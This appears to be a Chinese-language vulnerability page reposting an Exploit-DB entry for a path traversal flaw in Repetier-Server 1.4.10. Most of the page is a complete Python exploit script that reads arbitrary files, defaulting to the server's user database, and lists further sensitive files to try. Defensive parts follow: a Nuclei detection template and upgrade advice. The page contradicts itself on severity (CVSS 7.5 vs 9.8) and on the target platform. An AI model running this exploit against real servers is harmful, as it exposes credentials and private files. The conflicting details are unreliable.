[webapps] Repetier-Server 1.4.10 - Path Traversal
CVE-2026-26335
Repetier-Server 1.4.10 存在路径遍历漏洞,可读取任意文件。
High · CVSS 7.5📋 漏洞基础信息
| CVE | CVE-2026-26335 |
|---|---|
| 漏洞类型 | 路径遍历 |
| 受影响版本 | Repetier-Server 1.4.10 |
| 危害等级 | High · CVSS 7.5 |
| 发布日期 | 2026-04-30 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
文件请求处理中未对路径参数进行有效过滤,导致攻击者可通过../序列访问受限目录外的文件。
🎯 攻击场景
1. 攻击者确认目标运行Repetier-Server 1.4.10; 2. 构造包含../的URL,如http://target/printer/../../etc/passwd; 3. 发送请求; 4. 服务器返回/etc/passwd文件内容。
💥 漏洞影响
攻击者可读取服务器上的任意文件,导致敏感信息泄露(如配置文件、密码文件等),可能进一步扩大攻击面。
⚔️ 原始 PoC
原始PoC通过构造GET /printer/../../etc/passwd HTTP/1.1请求,利用路径遍历绕过文件访问限制,读取系统敏感文件。
# Exploit Author: Mohammed Idrees Banyamer
# Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
import requests
import argparse
import sys
from urllib.parse import urljoin
def generate_traversal(depth: int = 15) -> str:
return "..%5c" * depth
def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
traversal = generate_traversal(traversal_depth)
payloads = [
f"views{traversal}{file_path}/base/connectionLost.php",
f"base/connectionLost.php?file={traversal}{file_path}",
]
print(f"[*] Targeting: {target_url}")
print(f"[*] Attempting to read: {file_path}")
print(f"[*] Traversal depth: {traversal_depth}")
for payload in payloads:
exploit_url = urljoin(target_url.rstrip("/") + "/", payload)
try:
print(f" → Trying: {exploit_url}")
r = requests.get(exploit_url, timeout=timeout, verify=False)
if r.status_code == 200 and len(r.content) > 60:
sample = r.text[:500].replace("\n", " ").strip()
print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
print(f" Preview:\n {sample}...")
return True
else:
print(f" → Failed (status {r.status_code}, size {len(r.content)})")
except requests.RequestException as e:
print(f" → Error: {e}")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
)
parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
help="File path to read (use Windows \\ separator)")
parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
args = parser.parse_args()
if args.test:
args.file = "Windows\\win.ini"
print("[i] Running test mode → targeting Windows\\win.ini")
file_path = args.file.replace("\\", "%5c")
print("=" * 70)
print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
print("=" * 70, "\n")
success = attempt_read(args.target, file_path, args.depth)
if not success:
print("\n[!] Exploitation attempt failed.")
print("Suggestions:")
print(" • Increase --depth (try 18–30)")
print(" • Verify target is running Repetier-Server <=1.4.10")
print(" • Try alternative interesting files:")
print(" - ProgramData%5cRepetier-Server%5cconfig.xml")
print(" - Windows%5csystem32%5cdrivers%5cetc%5chosts")
if __name__ == "__main__":
main()🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-26335-detection
info:
name: Repetier-Server 1.4.10 - Path Traversal Detection
author: your-name
severity: high
description: |
Repetier-Server version 1.4.10 and below are vulnerable to a path traversal attack.
This template detects the potential vulnerability by checking the server version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-26335
tags: cve,cve2026,repetier,path-traversal
http:
- method: GET
path:
- '{{BaseURL}}/version'
- '{{BaseURL}}/api/info'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
matchers-condition: and
matchers:
- type: word
words:
- 'Repetier-Server'
part: body
- type: regex
part: body
regex:
- 'Repetier-Server[\/ ]+([0-9]+\.[0-9]+\.[0-9]+)'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- 'Repetier-Server[\/ ]+([0-9]+\.[0-9]+\.[0-9]+)'
part: body🛡️ 修复建议
升级至Repetier-Server 1.4.11或更高版本;临时措施:在Web服务器层面限制../路径访问,对用户输入进行规范化处理。
📎 参考链接
- https://www.exploit-db.com/exploits/52686
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26335
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:37 | 来源: Exploit-DB